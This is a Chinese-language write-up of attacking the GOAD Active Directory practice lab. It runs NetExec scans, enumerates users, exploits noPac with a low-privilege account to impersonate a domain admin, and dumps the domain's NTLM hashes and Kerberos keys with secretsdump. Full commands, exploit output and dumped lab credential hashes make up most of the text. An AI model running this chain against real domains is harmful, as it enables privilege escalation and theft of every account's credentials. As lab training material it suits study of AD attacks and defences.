网上看见了一个非常好的域渗透练习项目GOAD,搭建这块就不说了,直接开始。

信息收集

扫描

nxc smb 192.168.56.0/24

scan

有三台机器signing:True,根据经验判断这三台为域控,我们可以再扫一下LDAP端口进行验证

nxc ldap 192.168.56.0/24

nxc_ldap_scan

将这些机器添加进HOSTS文件中,以备后面使用Kerberos相关服务。

寻找域账号

当域控能被匿名SMB连接时能枚举到域账号

nxc smb 192.168.56.0/24 --users

Enumerate

这就直接给我们一个账号密码,只能说靶场就是靶场。

samwell.tarly:Heartsbane

获取域信息

这样我们就能通过LDAP认证获取更多的信息

1
2
3
4
5
6
7
┌──(kali㉿kali)-[~]
└─$ ldapdomaindump -u 'NORTH.SEVENKINGDOMS.LOCAL\samwell.tarly' -p Heartsbane -o NORTH.SEVENKINGDOMS.LOCAL 192.168.56.11
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

很遗憾,我们获得的账号并不在Doamin Admins组里

攻击NORTH.SEVENKINGDOMS.LOCAL

我们目前有两台机器在NORTH.SEVENKINGDOMS.LOCAL域内

1
2
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.56.22   445    CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)

通过LdapDomainDump的数据,有两名域管理员

1
2
eddaard.stark
Administrator

并且有一个域用户的帐号密码

samwell.tarly:Heartsbane

当有域账户时可以扫描域用户权限提升漏洞,如noPac,PrintNightmare

我们可以使用Netexec进行扫描

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[~/Downloads/krbrelayx-master]
└─$ nxc smb 192.168.56.11 -u samwell.tarly -p -M nopac -M spooler
SMB         192.168.56.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.56.11   445    WINTERFELL       [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
NOPAC       192.168.56.11   445    WINTERFELL       TGT with PAC size 1654
NOPAC       192.168.56.11   445    WINTERFELL       TGT without PAC size 817
NOPAC       192.168.56.11   445    WINTERFELL
NOPAC       192.168.56.11   445    WINTERFELL       VULNERABLE
NOPAC       192.168.56.11   445    WINTERFELL       Next step: https://github.com/Ridter/noPac
SPOOLER     192.168.56.11   445    WINTERFELL       Spooler service enabled

我们可以直接使用https://github.com/Ridter/noPac

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(noPac)─(kali㉿kali)-[~/Downloads/noPac]
└─$ python3 noPac.py north.sevenkingdoms.local/samwell.tarly:Heartsbane -dc-ip 192.168.56.11

███    ██  ██████  ██████   █████   ██████
████   ██ ██    ██ ██   ██ ██   ██ ██
██ ██  ██ ██    ██ ██████  ███████ ██
██  ██ ██ ██    ██ ██      ██   ██ ██
██   ████  ██████  ██      ██   ██  ██████

[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target winterfell.north.sevenkingdoms.local
[*] Total Domain Admins 3
[*] will try to impersonate eddard.stark
[*] Adding Computer Account "WIN-SXKFGMHCLVY$"
[*] MachineAccount "WIN-SXKFGMHCLVY$" password = 19EqF0n0imc2
[*] Successfully added machine account WIN-SXKFGMHCLVY$ with password 19EqF0n0imc2.
[*] WIN-SXKFGMHCLVY$ object = CN=WIN-SXKFGMHCLVY,CN=Computers,DC=north,DC=sevenkingdoms,DC=local
[*] WIN-SXKFGMHCLVY$ sAMAccountName == winterfell
[*] Saving a DC's ticket in winterfell.ccache
[*] Reseting the machine account to WIN-SXKFGMHCLVY$
[*] Restored WIN-SXKFGMHCLVY$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating eddard.stark
[*] 	Requesting S4U2self
[*] Saving a user's ticket in eddard.stark.ccache
[*] Rename ccache to eddard.stark_winterfell.north.sevenkingdoms.local.ccache
[*] Attempting to del a computer with the name: WIN-SXKFGMHCLVY$
[-] Delete computer WIN-SXKFGMHCLVY$ Failed! Maybe the current user does not have permission.

显示删除机器账户失败,没关系,票据申请到了就行。

使用secretsdump进行dump

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
┌──(kali㉿kali)-[~/Downloads/noPac]
└─$ ls -lian eddard.stark_winterfell.north.sevenkingdoms.local.ccache
3689526 -rw-rw-r-- 1 1000 1000 1545 Dec 20 10:03 eddard.stark_winterfell.north.sevenkingdoms.local.ccache

┌──(kali㉿kali)-[~/Downloads/noPac]
└─$export KRB5CCNAME=eddard.stark_winterfell.north.sevenkingdoms.local.ccache
3689526 -rw-rw-r-- 1 1000 1000 1545 Dec 20 10:03 eddard.stark_winterfell.north.sevenkingdoms.local.ccache

┌──(kali㉿kali)-[~/Downloads/noPac]
└─$ impacket-secretsdump -k -no-pass [email protected] -just-dc
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1afc3352b8464b283bc168d3dd935c78:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
arya.stark:1110:aad3b435b51404eeaad3b435b51404ee:4f622f4cd4284a887228940e2ff4e709:::
eddard.stark:1111:aad3b435b51404eeaad3b435b51404ee:d977b98c6c9282c5c478be1d97b237b8:::
catelyn.stark:1112:aad3b435b51404eeaad3b435b51404ee:cba36eccfd9d949c73bc73715364aff5:::
robb.stark:1113:aad3b435b51404eeaad3b435b51404ee:831486ac7f26860c9e2f51ac91e1a07a:::
sansa.stark:1114:aad3b435b51404eeaad3b435b51404ee:b777555c2e2e3716e075cc255b26c14d:::
brandon.stark:1115:aad3b435b51404eeaad3b435b51404ee:84bbaa1c58b7f69d2192560a3f932129:::
rickon.stark:1116:aad3b435b51404eeaad3b435b51404ee:7978dc8a66d8e480d9a86041f8409560:::
hodor:1117:aad3b435b51404eeaad3b435b51404ee:337d2667505c203904bd899c6c95525e:::
jon.snow:1118:aad3b435b51404eeaad3b435b51404ee:b8d76e56e9dac90539aff05e3ccb1755:::
samwell.tarly:1119:aad3b435b51404eeaad3b435b51404ee:f5db9e027ef824d029262068ac826843:::
jeor.mormont:1120:aad3b435b51404eeaad3b435b51404ee:6dccf1c567c56a40e56691a723a49664:::
sql_svc:1121:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
north.sevenkingdoms.local\admin01:1125:aad3b435b51404eeaad3b435b51404ee:ebdf1f3a95ab808bbf01ecec1ebdc7ee:::
WINTERFELL$:1001:aad3b435b51404eeaad3b435b51404ee:019b67b6b314f318bda1fcdf56fdec45:::
CASTELBLACK$:1105:aad3b435b51404eeaad3b435b51404ee:3a5c1723373cbe24b801b1cfecf6cec7:::
DESKTOP-HKO7PPDH$:1122:aad3b435b51404eeaad3b435b51404ee:05c7bca85e213cdea0ce9fc93a5c5952:::
krbrelay$:1123:aad3b435b51404eeaad3b435b51404ee:0eddedc35eb7b7ecde0c9f0564e54c83:::
win11$:1124:aad3b435b51404eeaad3b435b51404ee:106d6be7c86c1248e9f29410bf52891d:::
Test123$:1126:aad3b435b51404eeaad3b435b51404ee:4b130d040e6349f2813703bb671fef45:::
Test234$:1127:aad3b435b51404eeaad3b435b51404ee:04c53682276ad85b0680d03cbb608129:::
Test456$:1128:aad3b435b51404eeaad3b435b51404ee:04c53682276ad85b0680d03cbb608129:::
cd1234..$:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-SXKFGMHCLVY$:1131:aad3b435b51404eeaad3b435b51404ee:079b73f9d179047c70481513e24a60b1:::
SEVENKINGDOMS$:1104:aad3b435b51404eeaad3b435b51404ee:34831d00299c3d29c2e48fa7444afe8d:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:e7aa0f8a649aa96fab5ed9e65438392bfc549cb2695ac4237e97996823619972
Administrator:aes128-cts-hmac-sha1-96:bb7b6aed58a7a395e0e674ac76c28aa0
Administrator:des-cbc-md5:fe58cdcd13a43243
krbtgt:aes256-cts-hmac-sha1-96:2b2a02d222c517711baf01c1254a00ada695fd849fc8f0e92210587e10e257aa
krbtgt:aes128-cts-hmac-sha1-96:7a2021c885bcfc796aa694921c5a8b4a
krbtgt:des-cbc-md5:944032f875df7576
vagrant:aes256-cts-hmac-sha1-96:aa97635c942315178db04791ffa240411c36963b5a5e775e785c6bd21dd11c24
vagrant:aes128-cts-hmac-sha1-96:0d7c6160ffb016857b9af96c44110ab1
vagrant:des-cbc-md5:16dc9e8ad3dfc47f
arya.stark:aes256-cts-hmac-sha1-96:2001e8fb3da02f3be6945b4cce16e6abdd304974615d6feca7d135d4009d4f7d
arya.stark:aes128-cts-hmac-sha1-96:8477cba28e7d7cfe5338d172a23d74df
arya.stark:des-cbc-md5:13525243d6643285
eddard.stark:aes256-cts-hmac-sha1-96:f6b4d01107eb34c0ecb5f07d804fa9959dce6643f8e4688df17623b847ec7fc4
eddard.stark:aes128-cts-hmac-sha1-96:5f9b06a24b90862367ec221a11f92203
eddard.stark:des-cbc-md5:8067f7abecc7d346
catelyn.stark:aes256-cts-hmac-sha1-96:c8302e270b04252251de40b2bd5fba37395b55d5ed9ac95e03213dc739827283
catelyn.stark:aes128-cts-hmac-sha1-96:50ce7e2ad069fa40fb2bc7f5f9643d93
catelyn.stark:des-cbc-md5:6b314670a2f84cfb
robb.stark:aes256-cts-hmac-sha1-96:d7df5069178bbc93fdc34bbbcb8e374fd75c44d6ce51000f24688925cc4d9c2a
robb.stark:aes128-cts-hmac-sha1-96:b2965905e68356d63fedd9904357cc42
robb.stark:des-cbc-md5:c4b62c797f5dd01f
sansa.stark:aes256-cts-hmac-sha1-96:a268e7a385f4f165c6489c18a3bdeb52c5e505050449c6f9aeba4bc06a7fcbed
sansa.stark:aes128-cts-hmac-sha1-96:e2e6e885f6f4d3e25d759ea624961392
sansa.stark:des-cbc-md5:4c7c16e3f74cc4d3
brandon.stark:aes256-cts-hmac-sha1-96:6dd181186b68898376d3236662f8aeb8fa68e4b5880744034d293d18b6753b10
brandon.stark:aes128-cts-hmac-sha1-96:9de3581a163bd056073b71ab23142d73
brandon.stark:des-cbc-md5:76e61fda8a4f5245
rickon.stark:aes256-cts-hmac-sha1-96:79ffda34e5b23584b3bd67c887629815bb9ab8a1952ae9fda15511996587dcda
rickon.stark:aes128-cts-hmac-sha1-96:d4a0669b1eff6caa42f2632ebca8cd8d
rickon.stark:des-cbc-md5:b9ec3b8f2fd9d98a
hodor:aes256-cts-hmac-sha1-96:a33579ec769f3d6477a98e72102a7f8964f09a745c1191a705d8e1c3ab6e4287
hodor:aes128-cts-hmac-sha1-96:929126dcca8c698230b5787e8f5a5b60
hodor:des-cbc-md5:d5764373f2545dfd
jon.snow:aes256-cts-hmac-sha1-96:5a1bc13364e758131f87a1f37d2f1b1fa8aa7a4be10e3fe5a69e80a5c4c408fb
jon.snow:aes128-cts-hmac-sha1-96:d8bc99ccfebe2d6e97d15f147aa50e8b
jon.snow:des-cbc-md5:084358ceb3290d7c
samwell.tarly:aes256-cts-hmac-sha1-96:b66738c4d2391b0602871d0a5cd1f9add8ff6b91dcbb7bc325dc76986496c605
samwell.tarly:aes128-cts-hmac-sha1-96:3943b4ac630b0294d5a4e8b940101fae
samwell.tarly:des-cbc-md5:5efed0e0a45dd951
jeor.mormont:aes256-cts-hmac-sha1-96:be10f893afa35457fcf61ecc40dc032399b7aee77c87bb71dd2fe91411d2bd50
jeor.mormont:aes128-cts-hmac-sha1-96:1b0a98958e19d6092c8e8dc1d25c788b
jeor.mormont:des-cbc-md5:1a68641a3e9bb6ea
sql_svc:aes256-cts-hmac-sha1-96:24d57467625d5510d6acfddf776264db60a40c934fcf518eacd7916936b1d6af
sql_svc:aes128-cts-hmac-sha1-96:01290f5b76c04e39fb2cb58330a22029
sql_svc:des-cbc-md5:8645d5cd402f16c7
north.sevenkingdoms.local\admin01:aes256-cts-hmac-sha1-96:932317d6c409d624aea9f223a3d47ec9042b4e7d0bc856324e918189ccf33c97
north.sevenkingdoms.local\admin01:aes128-cts-hmac-sha1-96:6fa2d0782fe5a9a8946acdc34779b905
north.sevenkingdoms.local\admin01:des-cbc-md5:bab51aeca1ec1ca7
WINTERFELL$:aes256-cts-hmac-sha1-96:9f46dd231e24cd29a4fb9c92cc4bfb52ac90c4afedad4527ca3b3b879b9682b2
WINTERFELL$:aes128-cts-hmac-sha1-96:528ed5d9308e2a82a0d68748cb5d6c81
WINTERFELL$:des-cbc-md5:7ff72c75d5d683b5
CASTELBLACK$:aes256-cts-hmac-sha1-96:6f5423d17fd317a6bec4cfb0fe0872bfc43597cb622351b9c8ccfeca38d3be62
CASTELBLACK$:aes128-cts-hmac-sha1-96:ccdacc849a0c9800078212adb3f6f851
CASTELBLACK$:des-cbc-md5:6e68a4a19454349b
DESKTOP-HKO7PPDH$:aes256-cts-hmac-sha1-96:86c358a1374a7734c9da842e359e3fae878e7fcbe68ba40cf9dc61a399842f51
DESKTOP-HKO7PPDH$:aes128-cts-hmac-sha1-96:b4df35e06ffe272af05bf23c130d8d07
DESKTOP-HKO7PPDH$:des-cbc-md5:687c19cdaba49132
krbrelay$:aes256-cts-hmac-sha1-96:9b24562bed8ff22f72ddb14c597c74889100ce2b84749a396b4af47876be2f7f
krbrelay$:aes128-cts-hmac-sha1-96:513eabc0aa30a686a2e5fb4b937615ef
krbrelay$:des-cbc-md5:aec4043738c7e38c
win11$:aes256-cts-hmac-sha1-96:1a0872d983af4250b4eac66af59fdb3c57a35ccd1967420228810c526a35915e
win11$:aes128-cts-hmac-sha1-96:221795e2c6278e258edcb2750355adc5
win11$:des-cbc-md5:04fea88c9419a432
Test123$:aes256-cts-hmac-sha1-96:ddec45e9ba6aa0c87f5bfe1f732eda7bb66c97486beb7c69b0cfb8cddeef28ee
Test123$:aes128-cts-hmac-sha1-96:6341bf5ed96823f7d39af437c07a2e92
Test123$:des-cbc-md5:e07a4adc325d2c9e
Test234$:aes256-cts-hmac-sha1-96:f8746b95c42047051fa169f81b58ec88e1f8aac60dfe2c58cecab09b116ca32f
Test234$:aes128-cts-hmac-sha1-96:5114a367c629151d9e92c70ef2a74ecc
Test234$:des-cbc-md5:97d686b997920bdc
Test456$:aes256-cts-hmac-sha1-96:0cf0c36a22200e0c87471cfc84b4c2ca3b2824d49af6c8bcc271e10b77acb653
Test456$:aes128-cts-hmac-sha1-96:707002b94973e6a27446b574a09fa4c4
Test456$:des-cbc-md5:5bd6d319d5b0524a
WIN-SXKFGMHCLVY$:aes256-cts-hmac-sha1-96:9116d96c8434751c276e7201cd20bad12794d60eedb700f036b3bc259d1cbb5f
WIN-SXKFGMHCLVY$:aes128-cts-hmac-sha1-96:35f20ca5201ec3b910164ea74b0628cc
WIN-SXKFGMHCLVY$:des-cbc-md5:1f324697b66e7f3e
SEVENKINGDOMS$:aes256-cts-hmac-sha1-96:b06b661d4b02880e55e846888400f36a46c37b492baf9fca43c181498b0081cc
SEVENKINGDOMS$:aes128-cts-hmac-sha1-96:bc137e4170c0c00794c618de0606988e
SEVENKINGDOMS$:des-cbc-md5:f483da8651026b86
[*] Cleaning up...

后面就可以用Administrator的Hash去删除我们注册的域机器账户,这里就不再赘述。